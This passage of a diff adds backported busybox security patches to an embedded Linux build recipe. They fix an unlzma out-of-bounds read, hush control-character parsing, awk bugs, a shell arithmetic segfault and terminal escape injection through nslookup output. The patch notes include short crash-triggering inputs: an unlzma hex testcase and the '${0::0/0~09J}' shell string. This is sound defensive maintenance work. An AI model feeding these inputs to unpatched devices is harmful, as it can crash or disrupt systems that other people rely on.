+@@ -220,10 +220,20 @@ static const uint8_t border[] ALIGN1 = {
+ * each table.
+ * t: table to free
+ */
++#define BAD_HUFT(p) ((uintptr_t)(p) & 1)
++#define ERR_RET ((huft_t*)(uintptr_t)1)
+ static void huft_free(huft_t *p)
+ {
+ huft_t *q;
+
++ /*
++ * If 'p' has the error bit set we have to clear it, otherwise we might run
++ * into a segmentation fault or an invalid pointer to free(p)
++ */
++ if (BAD_HUFT(p)) {
++ p = (huft_t*)((uintptr_t)(p) ^ (uintptr_t)(ERR_RET));
++ }
++
+ /* Go through linked list, freeing from the malloced (t[-1]) address. */
+ while (p) {
+ q = (--p)->v.t;
diff --git a/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
new file mode 100644
index 0000000000..18bf5f19e4
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
@@ -0,0 +1,38 @@
+From c7e181fdf58c392e06ab805e2c044c3e57d5445a Mon Sep 17 00:00:00 2001
+From: Ariadne Conill <ariadne@dereferenced.org>
+Date: Sun, 3 Apr 2022 12:14:33 +0000
+Subject: [PATCH] libbb: sockaddr2str: ensure only printable characters are
+ returned for the hostname part
+
+CVE: CVE-2022-28391
+Upstream-Status: Pending
+Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ libbb/xconnect.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libbb/xconnect.c b/libbb/xconnect.c
+index eb2871cb1..b5520bb21 100644
+--- a/libbb/xconnect.c
++++ b/libbb/xconnect.c
+@@ -501,8 +501,9 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
+ );
+ if (rc)
+ return NULL;
++ /* ensure host contains only printable characters */
+ if (flags & IGNORE_PORT)
+- return xstrdup(host);
++ return xstrdup(printable_string(host));
+ #if ENABLE_FEATURE_IPV6
+ if (sa->sa_family == AF_INET6) {
+ if (strchr(host, ':')) /* heh, it's not a resolved hostname */
+@@ -513,7 +514,7 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
+ #endif
+ /* For now we don't support anything else, so it has to be INET */
+ /*if (sa->sa_family == AF_INET)*/
+- return xasprintf("%s:%s", host, serv);
++ return xasprintf("%s:%s", printable_string(host), serv);
+ /*return xstrdup(host);*/
+ }
+
diff --git a/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
new file mode 100644
index 0000000000..4a1960dff2
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
@@ -0,0 +1,81 @@
+From ceb378209f953ea745ed93a8645567196380ce3c Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Thu, 24 Jun 2021 19:13:22 +0200
+Subject: [PATCH] mktemp: add tmpdir option
+
+Make mktemp more compatible with coreutils.
+- add "--tmpdir" option
+- add long variants for "d,q,u" options
+
+Upstream-Status: Submitted [http://lists.busybox.net/pipermail/busybox/2021-June/088932.html]
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ coreutils/mktemp.c | 26 ++++++++++++++++++--------
+ 1 file changed, 18 insertions(+), 8 deletions(-)
+
+diff --git a/coreutils/mktemp.c b/coreutils/mktemp.c
+index 5393320a5..05c6d98c6 100644
+--- a/coreutils/mktemp.c
++++ b/coreutils/mktemp.c
+@@ -39,16 +39,17 @@
+ //kbuild:lib-$(CONFIG_MKTEMP) += mktemp.o
+
+ //usage:#define mktemp_trivial_usage
+-//usage: "[-dt] [-p DIR] [TEMPLATE]"
++//usage: "[-dt] [-p DIR, --tmpdir[=DIR]] [TEMPLATE]"
+ //usage:#define mktemp_full_usage "\n\n"
+ //usage: "Create a temporary file with name based on TEMPLATE and print its name.\n"
+ //usage: "TEMPLATE must end with XXXXXX (e.g. [/dir/]nameXXXXXX).\n"
+ //usage: "Without TEMPLATE, -t tmp.XXXXXX is assumed.\n"
+-//usage: "\n -d Make directory, not file"
+-//usage: "\n -q Fail silently on errors"
+-//usage: "\n -t Prepend base directory name to TEMPLATE"
+-//usage: "\n -p DIR Use DIR as a base directory (implies -t)"
+-//usage: "\n -u Do not create anything; print a name"
++//usage: "\n -d Make directory, not file"
++//usage: "\n -q Fail silently on errors"
++//usage: "\n -t Prepend base directory name to TEMPLATE"
++//usage: "\n -p DIR, --tmpdir[=DIR] Use DIR as a base directory (implies -t)"
++//usage: "\n For --tmpdir is a optional one."
++//usage: "\n -u Do not create anything; print a name"
+ //usage: "\n"
+ //usage: "\nBase directory is: -p DIR, else $TMPDIR, else /tmp"
+ //usage:
+@@ -72,13 +73,22 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
+ OPT_t = 1 << 2,
+ OPT_p = 1 << 3,
+ OPT_u = 1 << 4,
++ OPT_td = 1 << 5,
+ };
+
+ path = getenv("TMPDIR");
+ if (!path || path[0] == '\0')
+ path = "/tmp";
+
+- opts = getopt32(argv, "^" "dqtp:u" "\0" "?1"/*1 arg max*/, &path);
++ opts = getopt32long(argv, "^"
++ "dqtp:u\0"
++ "?1" /* 1 arg max */,
++ "directory\0" No_argument "d"
++ "quiet\0" No_argument "q"
++ "dry-run\0" No_argument "u"
++ "tmpdir\0" Optional_argument "\xff"
++ , &path, &path
++ );
+
+ chp = argv[optind];
+ if (!chp) {
+@@ -95,7 +105,7 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
+ goto error;
+ }
+ #endif
+- if (opts & (OPT_t|OPT_p))
++ if (opts & (OPT_t|OPT_p|OPT_td))
+ chp = concat_path_file(path, chp);
+
+ if (opts & OPT_u) {
+--
+2.11.0
+
diff --git a/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
new file mode 100644
index 0000000000..2c9da33a51
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
@@ -0,0 +1,64 @@
+From f8ad7c331b25ba90fd296b37c443b4114cb196e2 Mon Sep 17 00:00:00 2001
+From: Ariadne Conill <ariadne@dereferenced.org>
+Date: Sun, 3 Apr 2022 12:16:45 +0000
+Subject: [PATCH] nslookup: sanitize all printed strings with printable_string
+
+Otherwise, terminal sequences can be injected, which enables various terminal injection
+attacks from DNS results.
+
+MJ: One chunk wasn't applicable on 1.31.1 version, because parsing of
+SRV records was added only in newer 1.32.0 with:
+ commit 6b4960155e94076bf25518e4e268a7a5f849308e
+ Author: Jo-Philipp Wich <jo@mein.io>
+ Date: Thu Jun 27 17:27:29 2019 +0200
+
+ nslookup: implement support for SRV records
+
+CVE: CVE-2022-28391
+Upstream-Status: Pending
+Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ networking/nslookup.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/networking/nslookup.c b/networking/nslookup.c
+index 24e09d4f0..89b9c8a13 100644
+--- a/networking/nslookup.c
++++ b/networking/nslookup.c
+@@ -404,7 +404,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ //printf("Unable to uncompress domain: %s\n", strerror(errno));
+ return -1;
+ }
+- printf(format, ns_rr_name(rr), dname);
++ printf(format, ns_rr_name(rr), printable_string(dname));
+ break;
+
+ case ns_t_mx:
+@@ -419,7 +419,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ //printf("Cannot uncompress MX domain: %s\n", strerror(errno));
+ return -1;
+ }
+- printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, dname);
++ printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, printable_string(dname));
+ break;
+
+ case ns_t_txt:
+@@ -431,7 +431,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ if (n > 0) {
+ memset(dname, 0, sizeof(dname));
+ memcpy(dname, ns_rr_rdata(rr) + 1, n);
+- printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), dname);
++ printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), printable_string(dname));
+ }
+ break;
+
+@@ -461,7 +461,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ return -1;
+ }
+
+- printf("\tmail addr = %s\n", dname);
++ printf("\tmail addr = %s\n", printable_string(dname));
+ cp += n;
+
+ printf("\tserial = %lu\n", ns_get32(cp));
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
new file mode 100644
index 0000000000..aef8a3db85
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
@@ -0,0 +1,53 @@
+From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 15:07:57 +0200
+Subject: [PATCH] unlzma: fix a case where we could read before beginning of
+ buffer
+Cc: pavel@zhukoff.net
+
+Testcase:
+
+ 21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6
+ 00 17 02 10 11 0f ff 00 16 00 00
+
+Unfortunately, the bug is not reliably causing a segfault,
+the behavior depends on what's in memory before the buffer.
+
+function old new delta
+unpack_lzma_stream 2762 2768 +6
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42374
+Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937]
+Comment: testdata dropped because of binary format
+
+---
+ archival/libarchive/decompress_unlzma.c | 5 ++++-
+ testsuite/unlzma.tests | 17 +++++++++++++----
+ testsuite/unlzma_issue_3.lzma | Bin 0 -> 27 bytes
+ 3 files changed, 17 insertions(+), 5 deletions(-)
+ create mode 100644 testsuite/unlzma_issue_3.lzma
+
+diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c
+index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644
+--- a/archival/libarchive/decompress_unlzma.c
++++ b/archival/libarchive/decompress_unlzma.c
+@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate)
+ uint32_t pos;
+
+ pos = buffer_pos - rep0;
+- if ((int32_t)pos < 0)
++ if ((int32_t)pos < 0) {
+ pos += header.dict_size;
++ if ((int32_t)pos < 0)
++ goto bad;
++ }
+ match_byte = buffer[pos];
+ do {
+ int bit;
+--
+2.34.0
+
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
new file mode 100644
index 0000000000..c913eaee9c
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
@@ -0,0 +1,138 @@
+From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 16:05:57 +0200
+Subject: hush: fix handling of \^C and "^C"
+
+function old new delta
+parse_stream 2238 2252 +14
+encode_string 243 256 +13
+------------------------------------------------------------------------------
+(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0) Total: 27 bytes
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985)
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42376
+Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba]
+Comment: No changes in any hunk
+---
+ shell/ash_test/ash-misc/control_char3.right | 1 +
+ shell/ash_test/ash-misc/control_char3.tests | 2 ++
+ shell/ash_test/ash-misc/control_char4.right | 1 +
+ shell/ash_test/ash-misc/control_char4.tests | 2 ++
+ shell/hush.c | 11 +++++++++++
+ shell/hush_test/hush-misc/control_char3.right | 1 +
+ shell/hush_test/hush-misc/control_char3.tests | 2 ++
+ shell/hush_test/hush-misc/control_char4.right | 1 +
+ shell/hush_test/hush-misc/control_char4.tests | 2 ++
+ 9 files changed, 23 insertions(+)
+ create mode 100644 shell/ash_test/ash-misc/control_char3.right
+ create mode 100755 shell/ash_test/ash-misc/control_char3.tests
+ create mode 100644 shell/ash_test/ash-misc/control_char4.right
+ create mode 100755 shell/ash_test/ash-misc/control_char4.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char3.right
+ create mode 100755 shell/hush_test/hush-misc/control_char3.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char4.right
+ create mode 100755 shell/hush_test/hush-misc/control_char4.tests
+
+diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right
+new file mode 100644
+index 000000000..283e02cbb
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.right
+@@ -0,0 +1 @@
++SHELL: line 1: : not found
+diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right
+new file mode 100644
+index 000000000..2bf18e684
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.right
+@@ -0,0 +1 @@
++SHELL: line 1: -: not found
+diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+diff --git a/shell/hush.c b/shell/hush.c
+index 9fead37da..249728b9d 100644
+--- a/shell/hush.c
++++ b/shell/hush.c
+@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string,
+ }
+ #endif
+ o_addQchr(dest, ch);
++ if (ch == SPECIAL_VAR_SYMBOL) {
++ /* Convert "^C" to corresponding special variable reference */
++ o_addchr(dest, SPECIAL_VAR_QUOTED_SVS);
++ o_addchr(dest, SPECIAL_VAR_SYMBOL);
++ }
+ goto again;
+ #undef as_string
+ }
+@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring,
+ if (ch == '\n')
+ continue; /* drop \<newline>, get next char */
+ nommu_addchr(&ctx.as_string, '\\');
++ if (ch == SPECIAL_VAR_SYMBOL) {
++ nommu_addchr(&ctx.as_string, ch);
++ /* Convert \^C to corresponding special variable reference */
++ goto case_SPECIAL_VAR_SYMBOL;
++ }
+ o_addchr(&ctx.word, '\\');
+ if (ch == EOF) {
+ /* Testcase: eval 'echo Ok\' */
+@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring,
+ /* Note: nommu_addchr(&ctx.as_string, ch) is already done */
+
+ switch (ch) {
++ case_SPECIAL_VAR_SYMBOL:
+ case SPECIAL_VAR_SYMBOL:
+ /* Convert raw ^C to corresponding special variable reference */
+ o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL);
+diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right
+new file mode 100644
+index 000000000..94b4f8699
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.right
+@@ -0,0 +1 @@
++hush: can't execute '': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right
+new file mode 100644
+index 000000000..698e21427
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.right
+@@ -0,0 +1 @@
++hush: can't execute '-': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+--
+cgit v1.2.3
+
diff --git a/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
new file mode 100644
index 0000000000..dfba2a7e0f
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
@@ -0,0 +1,82 @@
+From c18ebf861528ef24958dd99a146482d2a40014c7 Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Mon, 12 Jun 2023 17:48:47 +0200
+Subject: [PATCH] shell: avoid segfault on ${0::0/0~09J}. Closes 15216
+
+function old new delta
+evaluate_string 1011 1053 +42
+
+CVE: CVE-2022-48174
+Upstream-Status: Backport [d417193cf37ca1005830d7e16f5fa7e1d8a44209]
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+---
+ shell/math.c | 39 +++++++++++++++++++++++++++++++++++----
+ 1 file changed, 35 insertions(+), 4 deletions(-)
+
+diff --git a/shell/math.c b/shell/math.c
+index af1ab55c0..79824e81f 100644
+--- a/shell/math.c
++++ b/shell/math.c
+@@ -578,6 +578,28 @@ static arith_t strto_arith_t(const char *nptr, char **endptr)
+ # endif
+ #endif
+
++//TODO: much better estimation than expr_len/2? Such as:
++//static unsigned estimate_nums_and_names(const char *expr)
++//{
++// unsigned count = 0;
++// while (*(expr = skip_whitespace(expr)) != '\0') {
++// const char *p;
++// if (isdigit(*expr)) {
++// while (isdigit(*++expr))
++// continue;
++// count++;
++// continue;
++// }
++// p = endofname(expr);
++// if (p != expr) {
++// expr = p;
++// count++;
++// continue;
++// }
++// }
++// return count;
++//}
++
+ static arith_t FAST_FUNC
+ evaluate_string(arith_state_t *math_state, const char *expr)
+ {
+@@ -585,10 +607,12 @@ evaluate_string(arith_state_t *math_state, const char *expr)
+ const char *errmsg;
+ const char *start_expr = expr = skip_whitespace(expr);
+ unsigned expr_len = strlen(expr) + 2;
+- /* Stack of integers */
+- /* The proof that there can be no more than strlen(startbuf)/2+1
+- * integers in any given correct or incorrect expression
+- * is left as an exercise to the reader. */
++ /* Stack of integers/names */
++ /* There can be no more than strlen(startbuf)/2+1
++ * integers/names in any given correct or incorrect expression.
++ * (modulo "09v09v09v09v09v" case,
++ * but we have code to detect that early)
++ */
+ var_or_num_t *const numstack = alloca((expr_len / 2) * sizeof(numstack[0]));
+ var_or_num_t *numstackptr = numstack;
+ /* Stack of operator tokens */
+@@ -657,6 +681,13 @@ evaluate_string(arith_state_t *math_state, const char *expr)
+ numstackptr->var = NULL;
+ errno = 0;
+ numstackptr->val = strto_arith_t(expr, (char**) &expr);
++ /* A number can't be followed by another number, or a variable name.
++ * We'd catch this later anyway, but this would require numstack[]
++ * to be twice as deep to handle strings where _every_ char is
++ * a new number or name. Example: 09v09v09v09v09v09v09v09v09v
++ */
++ if (isalnum(*expr) || *expr == '_')
++ goto err;
+ if (errno)
+ numstackptr->val = 0; /* bash compat */
+ goto num;
+--
+2.40.1
+
diff --git a/meta/recipes-core/busybox/busybox_1.31.1.bb b/meta/recipes-core/busybox/busybox_1.31.1.bb
index 7563368287..94aa1467df 100644
--- a/meta/recipes-core/busybox/busybox_1.31.1.bb
+++ b/meta/recipes-core/busybox/busybox_1.31.1.bb
@@ -50,7 +50,15 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \
file://0001-sysctl-ignore-EIO-of-stable_secret-below-proc-sys-ne.patch \
file://busybox-CVE-2018-1000500.patch \
file://0001-hwclock-make-glibc-2.31-compatible.patch \
-"
+ file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \
+ file://0001-mktemp-add-tmpdir-option.patch \
+ file://CVE-2021-42374.patch \
+ file://CVE-2021-42376.patch \
+ file://CVE-2021-423xx-awk.patch \
+ file://CVE-2022-48174.patch \
+ file://0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch \
+ file://0002-nslookup-sanitize-all-printed-strings-with-printable.patch \
+ "
SRC_URI_append_libc-musl = " file://musl.cfg "
SRC_URI[tarball.md5sum] = "70913edaf2263a157393af07565c17f0"
diff --git a/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
new file mode 100644
index 0000000000..7e3d47b88c
--- /dev/null
+++ b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
@@ -0,0 +1,215 @@
+From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001
+From: Sana Kazi <Sana.Kazi@kpit.com>
+Date: Wed, 8 Dec 2021 12:25:34 +0530
+Subject: [PATCH] busybox: Fix multiple security issues in awk
+
+Description: fix multiple security issues in awk
+Origin: backported awk.c from busybox 1.34.1
+
+CVE: CVE-2021-42378
+CVE: CVE-2021-42379
+CVE: CVE-2021-42380
+CVE: CVE-2021-42381
+CVE: CVE-2021-42382
+CVE: CVE-2021-42384
+CVE: CVE-2021-42385
+CVE: CVE-2021-42386
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz]
+
+Comment: Refreshed first hunk and removed few hunks as they are already present in source.
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <Ranjitsinh.Rathod@kpit.com>
+
+---
+ editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 60 insertions(+), 20 deletions(-)
+
+diff --git a/editors/awk.c b/editors/awk.c
+index d25508e..4e4f282 100644
+--- a/editors/awk.c
++++ b/editors/awk.c
+@@ -272,7 +272,8 @@ typedef struct tsplitter_s {
+ /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */
+ /* operator is inserted between them */
+ #define TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \
+- | TC_STRING | TC_NUMBER | TC_UOPPOST)
++ | TC_STRING | TC_NUMBER | TC_UOPPOST \
++ | TC_LENGTH)
+ #define TC_CONCAT2 (TC_OPERAND | TC_UOPPRE)
+
+ #define OF_RES1 0x010000
+@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 =
+
+ #define OC_B OC_BUILTIN
+
+-static const uint32_t tokeninfo[] = {
++static const uint32_t tokeninfo[] ALIGN4 = {
+ 0,
+ 0,
+ OC_REGEXP,
+@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected)
+ const uint32_t *ti;
+
+ if (t_rollback) {
++ debug_printf_parse("%s: using rolled-back token\n", __func__);
+ t_rollback = FALSE;
+ } else if (concat_inserted) {
++ debug_printf_parse("%s: using concat-inserted token\n", __func__);
+ concat_inserted = FALSE;
+ t_tclass = save_tclass;
+ t_info = save_info;
+@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected)
+ goto readnext;
+
+ /* insert concatenation operator when needed */
+- if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) {
++ debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__,
++ (ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP));
++ if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)
++ && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */
++ ) {
+ concat_inserted = TRUE;
+ save_tclass = tc;
+ save_info = t_info;
+@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected)
+ t_info = OC_CONCAT | SS | P(35);
+ }
+
++ debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass);
+ t_tclass = tc;
+ }
+ ltclass = t_tclass;
+@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected)
+ EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN);
+ }
+
++ debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double);
+ return ltclass;
+ #undef concat_inserted
+ #undef save_tclass
+@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp)
+ glptr = NULL;
+
+ } else if (tc & (TC_BINOP | TC_UOPPOST)) {
+- debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__);
++ debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc);
+ /* for binary and postfix-unary operators, jump back over
+ * previous operators with higher priority */
+ vn = cn;
+@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp)
+ v = cn->l.v = xzalloc(sizeof(var));
+ if (tc & TC_NUMBER)
+ setvar_i(v, t_double);
+- else
++ else {
+ setvar_s(v, t_string);
++ xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */
++ }
+ break;
+
+ case TC_REGEXP:
+@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp)
+
+ case TC_LENGTH:
+ debug_printf_parse("%s: TC_LENGTH\n", __func__);
+- next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM);
++ next_token(TC_SEQSTART /* length(...) */
++ | TC_OPTERM /* length; (or newline)*/
++ | TC_GRPTERM /* length } */
++ | TC_BINOPX /* length <op> NUM */
++ | TC_COMMA /* print length, 1 */
++ );
+ rollback_token();
+ if (t_tclass & TC_SEQSTART) {
+ /* It was a "(" token. Handle just like TC_BUILTIN */
+@@ -1747,12 +1763,34 @@ static void fsrealloc(int size)
+ nfields = size;
+ }
+
++static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[])
++{
++ int r = regexec(preg, s, 1, pmatch, 0);
++ if (r == 0 && pmatch[0].rm_eo == 0) {
++ /* For example, happens when FS can match
++ * an empty string (awk -F ' *'). Logically,
++ * this should split into one-char fields.
++ * However, gawk 5.0.1 searches for first
++ * _non-empty_ separator string match:
++ */
++ size_t ofs = 0;
++ do {
++ ofs++;
++ if (!s[ofs])
++ return REG_NOMATCH;
++ regexec(preg, s + ofs, 1, pmatch, 0);
++ } while (pmatch[0].rm_eo == 0);
++ pmatch[0].rm_so += ofs;
++ pmatch[0].rm_eo += ofs;
++ }
++ return r;
++}
++
+ static int awk_split(const char *s, node *spl, char **slist)
+ {
+- int l, n;
++ int n;
+ char c[4];
+ char *s1;
+- regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+
+ /* in worst case, each char would be a separate field */
+ *slist = s1 = xzalloc(strlen(s) * 2 + 3);
+@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist)
+ return n; /* "": zero fields */
+ n++; /* at least one field will be there */
+ do {
++ int l;
++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
++
+ l = strcspn(s, c+2); /* len till next NUL or \n */
+- if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0
++ if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0
+ && pmatch[0].rm_so <= l
+ ) {
++ /* if (pmatch[0].rm_eo == 0) ... - impossible */
+ l = pmatch[0].rm_so;
+- if (pmatch[0].rm_eo == 0) {
+- l++;
+- pmatch[0].rm_eo++;
+- }
+ n++; /* we saw yet another delimiter */
+ } else {
+ pmatch[0].rm_eo = l;
+ if (s[l])
+ pmatch[0].rm_eo++;
+ }
+- memcpy(s1, s, l);
+- /* make sure we remove *all* of the separator chars */
+- do {
+- s1[l] = '\0';
+- } while (++l < pmatch[0].rm_eo);
+- nextword(&s1);
++ s1 = mempcpy(s1, s, l);
++ *s1++ = '\0';
+ s += pmatch[0].rm_eo;
+ } while (*s);
++
++ /* echo a-- | awk -F-- '{ print NF, length($NF), $NF }'
++ * should print "2 0 ":
++ */
++ *s1 = '\0';
++
+ return n;
+ }
+ if (c[0] == '\0') { /* null split */
+@@ -1995,7 +2035,7 @@ static int ptest(node *pattern)
+ static int awk_getline(rstream *rsm, var *v)
+ {
+ char *b;
+- regmatch_t pmatch[2];
++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+ int size, a, p, pp = 0;
+ int fd, so, eo, r, rp;
+ char c, *m, *s;
diff --git a/meta/recipes-core/coreutils/coreutils_8.31.bb b/meta/recipes-core/coreutils/coreutils_8.31.bb
index 0c8452da98..3841f71155 100644
--- a/meta/recipes-core/coreutils/coreutils_8.31.bb
+++ b/meta/recipes-core/coreutils/coreutils_8.31.bb
@@ -26,6 +26,10 @@ SRC_URI_append_libc-musl = "file://strtod_fix_clash_with_strtold.patch"
